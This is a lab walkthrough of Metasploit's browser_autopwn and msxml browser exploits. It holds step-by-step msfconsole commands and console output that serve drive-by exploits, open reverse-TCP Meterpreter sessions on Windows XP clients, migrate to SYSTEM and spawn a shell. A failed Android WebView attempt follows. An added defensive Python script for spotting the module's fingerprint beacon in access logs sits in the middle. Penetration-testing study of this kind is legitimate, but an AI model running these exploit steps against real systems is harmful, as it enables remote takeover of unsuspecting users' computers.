Browser_Autopwn (Metasploit Revealed, Sagar Rahalkar)
summary on the front page
Browser auto_pwn
It launches a pile of exploits. Note: it takes quite a while to generate everything,
about 5-10 minutes (watch the CPU usage with top).
Full form (serve on port 80 at the root path):
```
use auxiliary/server/browser_autopwn
set srvhost 192.168.56.102
set lhost 192.168.56.102
set srvport 80
set uripath /
show options
run
```
Minimal form (SRVPORT stays at its default 8080 and URIPATH is random, as in the transcript below):
```
use auxiliary/server/browser_autopwn
set srvhost 192.168.56.102
set lhost 192.168.56.102
show options
run
```
```
msf5 > use auxiliary/server/browser_autopwn
msf5 auxiliary(server/browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits

msf5 auxiliary(server/browser_autopwn) > set lhost 192.168.56.101
lhost => 192.168.56.101
msf5 auxiliary(server/browser_autopwn) > run
[*] Auxiliary module running as background job 0.

[*] Setup
[*] Starting exploit modules on host 192.168.56.101...
[*] ---
```
Now you have to wait a good while for all the exploits to load.
```
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/yGiWU
[*] Local IP: http://127.0.0.1:8080/yGiWU
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/TGGGYVw
[*] Local IP: http://127.0.0.1:8080/TGGGYVw
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/kIGy
[*] Local IP: http://127.0.0.1:8080/kIGy
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/RXyHLJOQhJTC
[*] Local IP: http://127.0.0.1:8080/RXyHLJOQhJTC
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/MfKHQmsvNN
[*] Local IP: http://127.0.0.1:8080/MfKHQmsvNN
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/RDjFyhiPzK
[*] Local IP: http://127.0.0.1:8080/RDjFyhiPzK
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LBMmJJObUvOy
[*] Local IP: http://127.0.0.1:8080/LBMmJJObUvOy
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/yITfixb
[*] Local IP: http://127.0.0.1:8080/yITfixb
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/DOlFViQbnW
[*] Local IP: http://127.0.0.1:8080/DOlFViQbnW
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/szJQqrADM
[*] Local IP: http://127.0.0.1:8080/szJQqrADM
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/CdgiAE
[*] Local IP: http://127.0.0.1:8080/CdgiAE
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/CSpvCIPt
[*] Local IP: http://127.0.0.1:8080/CSpvCIPt
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/yXDuCwl
[*] Local IP: http://127.0.0.1:8080/yXDuCwl
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/fKRz
[*] Local IP: http://127.0.0.1:8080/fKRz
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/gxCOVYqvcQPy
[*] Local IP: http://127.0.0.1:8080/gxCOVYqvcQPy
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/eBnPp
[*] Local IP: http://127.0.0.1:8080/eBnPp
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/tIzVVYUeZovqP
[*] Local IP: http://127.0.0.1:8080/tIzVVYUeZovqP
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/OaCHr
[*] Local IP: http://127.0.0.1:8080/OaCHr
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/MJgTBfD
[*] Local IP: http://127.0.0.1:8080/MJgTBfD
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/rGoTxmWmCIxCQ
[*] Local IP: http://127.0.0.1:8080/rGoTxmWmCIxCQ
[*] Server started.
```
When it finishes loading, this should appear:
```
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.56.101:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.56.101:6666
[*] Started reverse TCP handler on 192.168.56.101:7777
[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:8080/y7MmvCi
[*] Local IP: http://127.0.0.1:8080/y7MmvCi
[*] Server started.
```
When a browser connects to the URL http://192.168.56.101:8080/y7MmvCi:
```
[*] Handling '/y7MmvCi'
[*] Handling '/y7MmvCi?sessid=V2luZG93cyBYUDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpTUDM6ZXM6eDg2Ok1TSUU6Ni4wOg%3d%3d'
[*] JavaScript Report: Windows XP:undefined:undefined:undefined:SP3:es:x86:MSIE:6.0:
[*] Responding with 14 exploits
[*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/
[*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb
[*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/
[*] 192.168.56.103 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/
[*] 192.168.56.103 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/
[*] 192.168.56.103 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.56.103 java_verifier_field_access - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK
[*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb
[*] 192.168.56.103 ie_createobject - Sending exploit HTML...
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/
[*] 192.168.56.103 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.56.103 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.56.103 java_verifier_field_access - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK
[*] 192.168.56.103 java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.56.103 java_atomicreferencearray - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb
[*] 192.168.56.103 ie_createobject - Sending exploit HTML...
[*] 192.168.56.103 java_jre17_jmxbean - handling request for /RDjFyhiPzK/
[*] 192.168.56.103 java_jre17_provider_skeleton - handling request for /LBMmJJObUvOy
[*] 192.168.56.103 java_jre17_reflection_types - handling request for /yITfixb/
[*] 192.168.56.103 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.56.103 java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.56.103 java_verifier_field_access - Generated jar to drop (5311 bytes).
[*] 192.168.56.103 java_jre17_provider_skeleton - handling request for /LBMmJJObUvOy/
```
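The `?sessid=` request in the output above is how browser_autopwn ships the client-side fingerprint back to the server; the "JavaScript Report" line is its decoded form (base64 of a colon-joined string). The script below is an added example for these notes, not code from the original page or from Metasploit: it pulls that beacon out of web-server or proxy access-log lines so that a defender can spot clients that loaded a browser_autopwn landing page. The nine field names are an assumption taken from the order in which the module's server side reads them; check the module source before relying on them. The log lines are constructed samples that reuse the sessid value from the transcript.

```python
"""Decode the browser_autopwn fingerprint beacon from web/proxy access logs.

Added example for these notes; it is not code from the original page or from
Metasploit. ASSUMPTION: the nine colon-separated fields are taken in the order
the module's server side reads them (os_name, os_vendor, os_device, os_flavor,
os_sp, os_lang, arch, ua_name, ua_version); check the module source before
relying on the names. The log lines below are constructed samples that reuse
the sessid value shown in the console output above.
"""
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# ASSUMED field order (see the docstring).
FIELDS = ("os_name", "os_vendor", "os_device", "os_flavor", "os_sp",
          "os_lang", "arch", "ua_name", "ua_version")

# Request line inside an Apache/nginx combined-format log entry.
REQ_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/\d\.\d"')


def decode_sessid(sessid: str) -> dict:
    """Turn one sessid value (possibly still percent-encoded) into a dict.

    The beacon is base64 of a colon-joined string with a trailing colon; the
    client-side JavaScript reports unknown values as the literal "undefined",
    which is mapped to None here. Raises ValueError/binascii.Error on input
    that is not a beacon.
    """
    raw = base64.b64decode(unquote(sessid), validate=True).decode("utf-8")
    parts = raw.split(":")
    if parts and parts[-1] == "":
        parts.pop()  # drop the empty field produced by the trailing ":"
    if len(parts) != len(FIELDS):
        raise ValueError(f"unexpected field count {len(parts)}: {raw!r}")
    return {k: (None if v == "undefined" else v) for k, v in zip(FIELDS, parts)}


def _query_params(path: str):
    """Yield (name, raw_value) pairs without the '+'-to-space conversion that
    parse_qs applies, which would corrupt base64 containing '+'."""
    for pair in urlsplit(path).query.split("&"):
        if "=" in pair:
            name, value = pair.split("=", 1)
            yield unquote(name), value


def scan_log(lines):
    """Yield (client_ip, fingerprint_dict) for each request carrying a beacon."""
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        for name, value in _query_params(m.group("path")):
            if name != "sessid":
                continue
            try:
                fp = decode_sessid(value)
            except (ValueError, binascii.Error, UnicodeDecodeError):
                continue  # a sessid parameter that is not a browser_autopwn beacon
            yield line.split()[0], fp


def summarize(lines):
    """Return [(ip, os, browser)] for the beacons found in the log lines."""
    out = []
    for ip, fp in scan_log(lines):
        os_ = " ".join(x for x in (fp["os_name"], fp["os_sp"]) if x)
        out.append((ip, os_, f"{fp['ua_name']} {fp['ua_version']}"))
    return out


# Constructed sample log entries (combined log format).
SAMPLE_LOG = """\
192.168.56.103 - - [26/Jul/2019:14:40:01 -0400] "GET /y7MmvCi HTTP/1.1" 200 1523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
192.168.56.103 - - [26/Jul/2019:14:40:02 -0400] "GET /y7MmvCi?sessid=V2luZG93cyBYUDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDpTUDM6ZXM6eDg2Ok1TSUU6Ni4wOg%3d%3d HTTP/1.1" 200 4096 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
10.0.0.7 - - [26/Jul/2019:14:41:10 -0400] "GET /search?sessid=notbase64!! HTTP/1.1" 404 0 "-" "curl/7.64.0"
""".splitlines()

if __name__ == "__main__":
    for ip, os_, browser in summarize(SAMPLE_LOG):
        print(f"{ip}: {browser} on {os_} reported a browser_autopwn beacon")
```

The parameter name `sessid` on its own is not a reliable indicator (plenty of applications use it); what identifies the beacon is that the value base64-decodes to a nine-field colon-separated string ending in a colon, which is why the decoder is strict about alphabet and field count and the scanner silently skips anything that fails.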
It does not work: Java has to be installed on the client machine.
I use version 1.7.0 (jre-7-windows-i586.exe).
When the browser connects to the URL, this time you see this:
```
[*] 192.168.56.1 java_atomicreferencearray - Sending jar
[*] Sending stage (53844 bytes) to 192.168.56.1
[*] Meterpreter session 14 opened (192.168.56.101:7777 -> 192.168.56.1:50818) at 2019-07-26 14:43:40 -0400
[*] Session ID 14 (192.168.56.101:7777 -> 192.168.56.1:50818) processing InitialAutoRunScript 'migrate -f'
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
```
And... a Session ID 14 appears.
```
msf5 auxiliary(server/browser_autopwn) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information   Connection
  --  ----  ----                     -----------   ----------
  15        meterpreter java/windows pp @ xpentst  192.168.56.101:7777 -> 192.168.56.1:50828 (10.0.2.15)
  16        meterpreter java/windows pp @ xpentst  192.168.56.101:7777 -> 192.168.56.1:50830 (10.0.2.15)
  17        meterpreter java/windows pp @ xpentst  192.168.56.101:7777 -> 192.168.56.1:50884 (10.0.2.15)
  18        meterpreter java/windows pp @ xpentst  192.168.56.101:7777 -> 192.168.56.1:50894 (10.0.2.15)
  19        meterpreter java/windows pp @ xpentst  192.168.56.101:7777 -> 192.168.56.1:50896 (10.0.2.15)

msf5 auxiliary(server/browser_autopwn) >
```
Note: several sessions show up for one PC because there is more than one vulnerability, so more than one of the launched exploits succeeds against the same client.
I connect to a session and I already have meterpreter.
```
msf5 auxiliary(server/browser_autopwn) > sessions -i 18
[*] Starting interaction with 18...

meterpreter > sysinfo
Computer    : xpentst
OS          : Windows XP 5.1 (x86)
Meterpreter : java/windows
meterpreter >
```
```
use exploit/windows/browser/msxml_get_definition_code_exec
run
```
```
msf5 > use exploit/windows/browser/msxml_get_definition_code_exec
msf5 exploit(windows/browser/msxml_get_definition_code_exec) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.43.204:4444
[*] Using URL: http://0.0.0.0:8080/Xh30XH
[*] Local IP: http://192.168.43.204:8080/Xh30XH
[*] Server started.
```
The "Exploit completed, but no session was created." line is printed right away because the browser exploit runs as a background job; the session only arrives once a vulnerable client loads the URL. When a vulnerable client connects to http://192.168.43.204:8080/Xh30XH:
```
[*] 192.168.43.124 msxml_get_definition_code_exec - 192.168.43.124:60208 - Sending html
[*] Sending stage (179779 bytes) to 192.168.43.124
[*] Meterpreter session 1 opened (192.168.43.204:4444 -> 192.168.43.124:57732) at 2019-08-06 21:00:20 +0000
[*] Session ID 1 (192.168.43.204:4444 -> 192.168.43.124:57732) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is iexplore.exe (1908) as: HOME\pp
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (464)
[+] Successfully migrated to services.exe (464) as: NT AUTHORITY\SYSTEM
```
To interact with session 1: `sessions -i 1`
```
msf5 exploit(windows/browser/msxml_get_definition_code_exec) > sessions -i 1
[*] Starting interaction with 3...

meterpreter >
```
System information with `sysinfo`, and a shell with `shell`:
```
meterpreter > sysinfo
Computer        : HOME
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : es_MX
Domain          : GRUPO_TRABAJO
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 704 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
```
Others (that have worked):
* multi/browser/java_verifier_field_access (with Java 7)
* multi/browser/java_rhino
* multi/browser/java_atomicreferencearray
* multi/browser/java_jre17_provider_skeleton

Payloads:
* generic/shell_reverse_tcp
* java/meterpreter/reverse_tcp
* windows/meterpreter/reverse_tcp

___

Attempt (does not work (yet)): meterpreter on Windows/Android from a URL:
```
use exploit/android/browser/webview_addjavascriptinterface
set srvhost 192.168.56.102
set lhost 192.168.56.102
set srvport 80
set uripath /
run
```
```
msf5 > use exploit/android/browser/webview_addjavascriptinterface
msf5 exploit(android/browser/webview_addjavascriptinterface) > show options

Module options (exploit/android/browser/webview_addjavascriptinterface):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Retries  true             no        Allow the browser to retry the module
   SRVHOST  0.0.0.0          yes       The local host to listen on. Address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(android/browser/webview_addjavascriptinterface) > set srvhost 192.168.1.4
msf5 exploit(android/browser/webview_addjavascriptinterface) > set srvport 80
msf5 exploit(android/browser/webview_addjavascriptinterface) > set uripath /
msf5 exploit(android/browser/webview_addjavascriptinterface) > set lhost 192.168.1.4
msf5 exploit(android/browser/webview_addjavascriptinterface) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.4:4444
[*] Using URL: http://192.168.1.4:80/
[*] Server started.
msf5 exploit(android/browser/webview_addjavascriptinterface) >
[*] 192.168.1.230 webview_addjavascriptinterface - Gathering target information for 192.168.1.230
[*] 192.168.1.230 webview_addjavascriptinterface - Sending HTML response to 192.168.1.230
[-] 192.168.1.230 webview_addjavascriptinterface - Target 192.168.1.230 has requested an unknown path: /favicon.ico
[!] 192.168.1.230 webview_addjavascriptinterface - Exploit requirement(s) not met: os_name, vuln_test. For more info: http://r-7.co/PVbcgx
[!] 192.168.1.230 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context.
[*] 192.168.1.8 webview_addjavascriptinterface - Gathering target information for 192.168.1.8
[*] 192.168.1.8 webview_addjavascriptinterface - Sending HTML response to 192.168.1.8
[!] 192.168.1.8 webview_addjavascriptinterface - Exploit requirement(s) not met: os_name, vuln_test. For more info: http://r-7.co/PVbcgx
[!] 192.168.1.8 webview_addjavascriptinterface - No vulnerable Java objects were found in this web context.
```